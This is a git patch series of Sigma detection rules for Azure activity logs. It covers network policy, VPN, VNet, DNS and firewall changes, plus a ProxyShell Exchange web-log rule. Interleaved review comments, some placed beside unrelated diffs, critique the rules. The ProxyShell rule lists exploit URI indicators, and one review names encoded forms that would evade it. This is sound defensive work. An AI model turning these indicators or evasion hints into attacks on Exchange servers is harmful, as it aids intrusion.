@@ -1,23 +0,0 @@ -title: Azure Kubernetes Network Policy Change -id: 51d93227-8168-4907-8fb1-ffde5b654985 -description: Identifies when a Azure Kubernetes network policy is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From e6261f42693699f0a5172bede4791fc0049fc388 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:16:18 -0500 Subject: [PATCH 0226/1367] Create azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml new file mode 100644 index 00000000..ffb7f3ce --- /dev/null +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml 
@@ -0,0 +1,23 @@ +title: Azure Kubernetes Network Policy Change +id: +description: Identifies when a Azure Kubernetes network policy is modified or deleted. +author: Austin Songer @austinsonger +status: experimental +date: 2021/08/07 +references: + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes +logsource: + service: azure.activitylogs +detection: + selection: + properties.message: + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE + - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE + condition: selection +level: medium +tags: + - attack.impact +falsepositives: + - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From a584a01a9af0ea464ca8d411b16bca77cafaa8dd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:16:30 -0500 Subject: [PATCH 0227/1367] Delete azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 23 ------------------- 1 file changed, 23 deletions(-) delete mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml deleted file mode 100644 index ffb7f3ce..00000000 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ /dev/null 
@@ -1,23 +0,0 @@ -title: Azure Kubernetes Network Policy Change -id: -description: Identifies when a Azure Kubernetes network policy is modified or deleted. -author: Austin Songer @austinsonger -status: experimental -date: 2021/08/07 -references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes -logsource: - service: azure.activitylogs -detection: - selection: - properties.message: - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE - - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE - condition: selection -level: medium -tags: - - attack.impact -falsepositives: - - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule. From 4e645c10337a14a8ebbd0b96312f86af3a8b7609 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 01:17:01 -0500 Subject: [PATCH 0228/1367] Create azure_kubernetes_network_policy_change.yml --- ...azure_kubernetes_network_policy_change.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_kubernetes_network_policy_change.yml diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml new file mode 100644 index 00000000..488d9886 --- /dev/null +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml 
@@ -0,0 +1,24 @@
+title: Azure Kubernetes Network Policy Change
+id: 08d6ac24-c927-4469-b3b7-2e422d6e3c43
+description: Identifies when a Azure Kubernetes network policy is modified or deleted.
+author: Austin Songer @austinsonger
+status: experimental
+date: 2021/08/07
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/WRITE
+ - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/NETWORKING.K8S.IO/NETWORKPOLICIES/DELETE
+ - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/WRITE
+ - MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS/EXTENSIONS/NETWORKPOLICIES/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+ - attack.credential_access
+falsepositives:
+ - Network Policy being modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Network Policy being modified and deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 54432980922e47bedb8609de14bc37a7f14d599f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 8 Aug 2021 18:52:49 +0200 Subject: [PATCH 0229/1367] rule: ProxyShell improved --- rules/web/web_exchange_proxyshell.yml | 17 ++++++++++------- 1 file changed, 10 insertions(+), 7 deletions(-)
diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml
index a838600a..b23276d0 100644
--- a/rules/web/web_exchange_proxyshell.yml
+++ b/rules/web/web_exchange_proxyshell.yml
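Review bot: The `attack.credential_access` tag added under `tags:` does not fit what the selection matches — writing or deleting a Kubernetes NetworkPolicy weakens segmentation but yields no credentials; keep `- attack.impact` (a defense-evasion tag would be more defensible than credential access) and drop `- attack.credential_access`. Separately, all four operations sit under the MICROSOFT.KUBERNETES/CONNECTEDCLUSTERS provider, which as far as I can tell covers Arc-enabled connected clusters only, so a title of "Azure Kubernetes" overstates coverage: AKS-managed clusters presumably log under a different resource provider and would not be matched. Either extend the operation list to that provider after checking the linked operations page, or say in the description that the rule is scoped to Arc-connected clusters.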
@@ -7,17 +7,20 @@ references: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 author: Florian Roth -date: 2020/08/07 +date: 2021/08/07 +modified: 2021/08/08 tags: - attack.initial_access logsource: category: webserver detection: - selection1: - c-uri|contains|all: - - '/autodiscover/autodiscover.json?' + selection_auto: + c-uri|contains: '/autodiscover/autodiscover.json?' + selection_uri: + c-uri|contains: - '/powershell' - selection2: + - '/mapi/nspi' + selection_poc: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions - 'autodiscover.json?@' @@ -25,7 +28,7 @@ detection: - '%3f@foo.com' - 'Email=autodiscover/autodiscover.json' - 'json?@foo.com' - condition: 1 of them + condition: selection_auto and selection_uri or selection_poc falsepositives: - - Unknown + - Could only be an attempt and not a successful attack level: high \ No newline at end of file From 01ef593727384fa15ea01acd328d76635f712124 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:11:31 -0500 Subject: [PATCH 0230/1367] Update azure_kubernetes_rolebinding_modified_or_deleted.yml --- .../azure_kubernetes_rolebinding_modified_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml index 67de51ff..f805aadf 100644 --- a/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_rolebinding_modified_or_deleted.yml 
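Review bot: `selection_poc` still has no URL-encoded form of the `@` that the path confusion depends on, so `'autodiscover.json?@'` and `'json?@foo.com'` will not fire on a request logged as `autodiscover.json?%40foo.com`, even though the comment says all versions are covered and `'%3f@foo.com'` already accounts for an encoded `?`. Add `- 'autodiscover.json?%40'`, `- 'json?%40foo.com'` and `- '%3f%40foo.com'` so a difference in how the proxy or IIS encodes the URI does not evade the rule. The new `condition: selection_auto and selection_uri or selection_poc` is correct only because Sigma binds `and` tighter than `or`; writing it as `(selection_auto and selection_uri) or selection_poc` makes that intent explicit to the next reader. The `references:` list this hunk edits starts above the hunk.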
@@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From 74f449335217cecf573d8905f8f0605be086f2ca Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:11:47 -0500 Subject: [PATCH 0231/1367] Update azure_kubernetes_cluster_created_or_deleted.yml --- rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml index be97bf7b..ee76990b 100644 --- a/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_cluster_created_or_deleted.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From f7e7be15ba2c63b906d97cdce4e34d29322bc8ff Mon Sep 17 00:00:00 2001 
From: Austin Songer Date: Sun, 8 Aug 2021 15:12:04 -0500 Subject: [PATCH 0232/1367] Update azure_kubernetes_service_account_modified_or_deleted.yml --- .../azure_kubernetes_service_account_modified_or_deleted.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml index ddae4ee5..2e89711e 100644 --- a/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml +++ b/rules/cloud/azure_kubernetes_service_account_modified_or_deleted.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From cba78fc5e63ac37f71429fb12e35c8cfa0be11ee Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:12:23 -0500 Subject: [PATCH 0233/1367] Update azure_container_registry_created_or_deleted.yml --- rules/cloud/azure_container_registry_created_or_deleted.yml | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/rules/cloud/azure_container_registry_created_or_deleted.yml b/rules/cloud/azure_container_registry_created_or_deleted.yml index 0bf949a2..4b8897bb 100644 --- a/rules/cloud/azure_container_registry_created_or_deleted.yml +++ b/rules/cloud/azure_container_registry_created_or_deleted.yml 
@@ -5,7 +5,11 @@ author: Austin Songer status: experimental date: 2021/08/07 references: - - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations + - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From 12565b4fd45c2284ff67a74cbb395d4d628e1311 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 15:12:43 -0500 Subject: [PATCH 0234/1367] Update azure_kubernetes_role_access.yml --- rules/cloud/azure_kubernetes_role_access.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_role_access.yml b/rules/cloud/azure_kubernetes_role_access.yml index 2a6dab4d..553711ec 100644 --- a/rules/cloud/azure_kubernetes_role_access.yml +++ b/rules/cloud/azure_kubernetes_role_access.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From 96ae859a7beb0fbf1b83cfde0585b7a66e2fe7dd Mon Sep 17 00:00:00 2001 
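Review bot: The reference URL in the first hunk is changed to carry the `#microsoftkubernetes` anchor, but this file is the container registry rule (from its name; the detection block is outside the hunk), whose operations are documented under the Microsoft.ContainerRegistry provider on that page — a reader following the link lands on the wrong operation table. Use the anchor for the Microsoft.ContainerRegistry section or keep the un-anchored page URL, as the original line had.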
From: Austin Songer Date: Sun, 8 Aug 2021 15:13:02 -0500 Subject: [PATCH 0235/1367] Update azure_kubernetes_network_policy_change.yml --- rules/cloud/azure_kubernetes_network_policy_change.yml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/rules/cloud/azure_kubernetes_network_policy_change.yml b/rules/cloud/azure_kubernetes_network_policy_change.yml index 488d9886..85317337 100644 --- a/rules/cloud/azure_kubernetes_network_policy_change.yml +++ b/rules/cloud/azure_kubernetes_network_policy_change.yml @@ -6,6 +6,10 @@ status: experimental date: 2021/08/07 references: - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes + - https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/ + - https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/ + - https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1 + - https://attack.mitre.org/matrices/enterprise/cloud/ logsource: service: azure.activitylogs detection: From a80f9f280c0c1dd2dbc99f251aa7865719b5c1aa Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 8 Aug 2021 23:05:23 +0200 Subject: [PATCH 0236/1367] refactor: feedback from Rich Warren --- rules/web/web_exchange_proxyshell.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index b23276d0..4ba047f3 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -6,7 +6,7 @@ references: - https://youtu.be/5mqid-7zp8k?t=2231 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 -author: Florian Roth +author: Florian Roth, Rich Warren date: 2021/08/07 modified: 2021/08/08 tags: 
@@ -20,6 +20,8 @@ detection: c-uri|contains: - '/powershell' - '/mapi/nspi' + - '/EWS' + - 'X-Rps-CAT' selection_poc: c-uri|contains: # since we don't know how it will appear in the log files, we'll just use all versions From af1e43f3c1009d8fc409bdd4f00dcbd92b7c7453 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Sun, 8 Aug 2021 23:05:56 +0200 Subject: [PATCH 0237/1367] more generic --- rules/web/web_exchange_proxyshell.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/web/web_exchange_proxyshell.yml b/rules/web/web_exchange_proxyshell.yml index 4ba047f3..abcd6c03 100644 --- a/rules/web/web_exchange_proxyshell.yml +++ b/rules/web/web_exchange_proxyshell.yml @@ -15,7 +15,7 @@ logsource: category: webserver detection: selection_auto: - c-uri|contains: '/autodiscover/autodiscover.json?' + c-uri|contains: '/autodiscover.json' selection_uri: c-uri|contains: - '/powershell' From 6bc42501d340c70b310d3733b77a48a0fd6ec228 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:11:59 -0500 Subject: [PATCH 0238/1367] Create azure_vpn_connection_modified_or_deleted.yml --- ...ure_vpn_connection_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_vpn_connection_modified_or_deleted.yml diff --git a/rules/cloud/azure_vpn_connection_modified_or_deleted.yml b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml new file mode 100644 index 00000000..d41326fd --- /dev/null +++ b/rules/cloud/azure_vpn_connection_modified_or_deleted.yml 
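Review bot: Every indicator this rule relies on — the newly added `'X-Rps-CAT'`, the `?@`/`Email=` strings in `selection_poc` — lives in the query string, while IIS W3C logs record the path in `cs-uri-stem` and the query separately in `cs-uri-query`; if a deployment's `c-uri` mapping carries only the stem, `X-Rps-CAT` and most of `selection_poc` can never match. I would add a comment next to the field, `# c-uri must include the query string (IIS cs-uri-query), otherwise the PoC strings cannot match`, or say so in the description so deployers check their mapping. The second hunk's broadening to `'/autodiscover.json'` is fine because `selection_uri` still has to co-occur in the same URI; note that `'/EWS'` is a legitimate path on its own and only stays quiet because of that conjunction. The detection block continues outside both hunks.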
@@ -0,0 +1,22 @@
+title: Azure VPN Connection Modified or Deleted
+id: 61171ffc-d79c-4ae5-8e10-9323dba19cd3
+description: Identifies when a VPN connection is modified or deleted.
+author: Austin Songer
+status: experimental
+date: 2021/08/08
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE
+ - MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - VPN Connection being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - VPN Connection modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 47c88386258422b5a24c34147c76a9103f99f9b6 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:16:06 -0500 Subject: [PATCH 0239/1367] Create azure_virtual_network_modified_or_deleted.yml --- ...re_virtual_network_modified_or_deleted.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/cloud/azure_virtual_network_modified_or_deleted.yml
diff --git a/rules/cloud/azure_virtual_network_modified_or_deleted.yml b/rules/cloud/azure_virtual_network_modified_or_deleted.yml new file mode 100644
index 00000000..ab700f89
--- /dev/null
+++ b/rules/cloud/azure_virtual_network_modified_or_deleted.yml
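Review bot: `MICROSOFT.NETWORK/VPNGATEWAYS/VPNCONNECTIONS/WRITE` and `/DELETE` cover only connections on Virtual WAN VPN gateways; site-to-site and VNet-to-VNet connections on an ordinary virtual network gateway are, as far as I recall, logged as `MICROSOFT.NETWORK/CONNECTIONS/WRITE` and `MICROSOFT.NETWORK/CONNECTIONS/DELETE`, so the more common deployment is not covered. Add those two operations after checking the linked operations page, or state the Virtual WAN scope in the title. Also, `/WRITE` is the ARM PUT and fires on creation as well as modification, so the description "modified or deleted" undersells what this rule will alert on.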
@@ -0,0 +1,24 @@
+title: Azure Virtual Network Modified or Deleted
+id: bcfcc962-0e4a-4fd9-84bb-a833e672df3f
+description: Identifies when a Virtual Network is modified or deleted in Azure.
+author: Austin Songer
+status: experimental
+date: 2021/08/08
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/WRITE
+ - MICROSOFT.NETWORK/VIRTUALNETWORKGATEWAYS/DELETE
+ - MICROSOFT.NETWORK/VIRTUALNETWORKS/WRITE
+ - MICROSOFT.NETWORK/VIRTUALNETWORKS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Virtual Network being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Virtual Network modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From f75260211184dae7efc8d682af6aee02479074bd Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:42:08 -0500 Subject: [PATCH 0240/1367] Create azure_dns_zone_modified_or_deleted.yml --- .../azure_dns_zone_modified_or_deleted.yml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 rules/cloud/azure_dns_zone_modified_or_deleted.yml
diff --git a/rules/cloud/azure_dns_zone_modified_or_deleted.yml b/rules/cloud/azure_dns_zone_modified_or_deleted.yml new file mode 100644
index 00000000..e5c547be
--- /dev/null
+++ b/rules/cloud/azure_dns_zone_modified_or_deleted.yml
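Review bot: The selection omits the subnet-level operations — `MICROSOFT.NETWORK/VIRTUALNETWORKS/SUBNETS/WRITE` and `/DELETE` — which is where NSG and route-table associations are changed, so a common way of weakening segmentation goes unseen while a VNet-level PUT (including creation, since `/WRITE` covers it) does fire. The two `VIRTUALNETWORKGATEWAYS` entries are also not what the title or description describe; either split gateways into their own rule or mention them in the description. I would add the subnet operations and note in `falsepositives` that normal provisioning will trigger the VNet `/WRITE` entry.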
@@ -0,0 +1,43 @@
+title: Azure DNS Zone Modified or Deleted
+id: af6925b0-8826-47f1-9324-337507a0babd
+description: Identifies when DNS zone is modified or deleted.
+author: Austin Songer
+status: experimental
+date: 2021/08/07
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/DNSZONES/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/A/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/A/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/AAAA/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/AAAA/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/CAA/READ
+ - MICROSOFT.NETWORK/DNSZONES/CAA/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/CAA/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/CNAME/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/CNAME/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/MX/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/MX/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/NS/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/NS/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/PTR/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/PTR/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/SOA/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/SRV/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/SRV/DELETE
+ - MICROSOFT.NETWORK/DNSZONES/TXT/WRITE
+ - MICROSOFT.NETWORK/DNSZONES/TXT/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+ - attack.credential_access
+falsepositives:
+ - DNS zone modified and deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - DNS zone modification from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From dc33f131f13203d64ebe1f73f9c63147336b3eff Mon Sep 17 00:00:00 2001
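Review bot: `- MICROSOFT.NETWORK/DNSZONES/CAA/READ` is a read operation in a rule whose title, description and every other entry are about writes and deletes; reads are far more frequent than changes, so this one line adds noise without detecting a modification — drop it (if CAA reads matter as reconnaissance they belong in a separate, lower-severity rule). The reference anchor `#microsoftkubernetes` also points at the wrong provider section for a DNS rule; use the Microsoft.Network section or the un-anchored page URL. As with the sibling rules, `/WRITE` also fires on record creation, which the description could say.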
From: Austin Songer Date: Sun, 8 Aug 2021 22:42:51 -0500 Subject: [PATCH 0241/1367] Create azure_firewall_modified_or_deleted.yml --- .../azure_firewall_modified_or_deleted.yml | 22 +++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 rules/cloud/azure_firewall_modified_or_deleted.yml
diff --git a/rules/cloud/azure_firewall_modified_or_deleted.yml b/rules/cloud/azure_firewall_modified_or_deleted.yml new file mode 100644
index 00000000..d37781a6
--- /dev/null
+++ b/rules/cloud/azure_firewall_modified_or_deleted.yml
@@ -0,0 +1,22 @@
+title: Azure Firewall Modified or Deleted
+id: 512cf937-ea9b-4332-939c-4c2c94baadcd
+description: Identifies when a firewall is created, modified, or deleted.
+author: Austin Songer
+status: experimental
+date: 2021/08/08
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/DELETE
+ condition: selection
+level: medium
+tags:
+ - attack.impact
+falsepositives:
+ - Firewall being modified or deleted may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.
+ - Firewall modified or deleted from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule.
From 35f5b56853cc72ac5a891867604174ef5865df95 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sun, 8 Aug 2021 22:43:47 -0500 Subject: [PATCH 0242/1367] Create azure_firewall_rule_collection_modified_or_deleted.yml --- ...ll_rule_collection_modified_or_deleted.yml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml
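Review bot: The title says "Modified or Deleted" while the description says "created, modified, or deleted"; because `MICROSOFT.NETWORK/AZUREFIREWALLS/WRITE` is the ARM PUT that also creates the resource, the description is the accurate one, so align the title, e.g. `title: Azure Firewall Created, Modified or Deleted`. Worth saying in `falsepositives` that firewall deployments through IaC pipelines will trigger the `/WRITE` entry routinely, so the rule is most useful when the identity is not a known deployment principal.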
diff --git a/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml b/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml new file mode 100644
index 00000000..6fb67edb
--- /dev/null
+++ b/rules/cloud/azure_firewall_rule_collection_modified_or_deleted.yml
@@ -0,0 +1,26 @@
+title: Azure Firewall Rule Collection Modified or Deleted
+id: 025c9fe7-db72-49f9-af0d-31341dd7dd57
+description: Identifies when Rule Collections (Application, NAT, and Network) is being modified or deleted.
+author: Austin Songer
+status: experimental
+date: 2021/08/08
+references:
+ - https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations
+logsource:
+ service: azure.activitylogs
+detection:
+ selection:
+ properties.message:
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/WRITE
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/APPLICATIONRULECOLLECTIONS/DELETE
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/WRITE
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/NATRULECOLLECTIONS/DELETE
+ - MICROSOFT.NETWORK/AZUREFIREWALLS/NETWORKRULECOLLECTIONS/WRITE
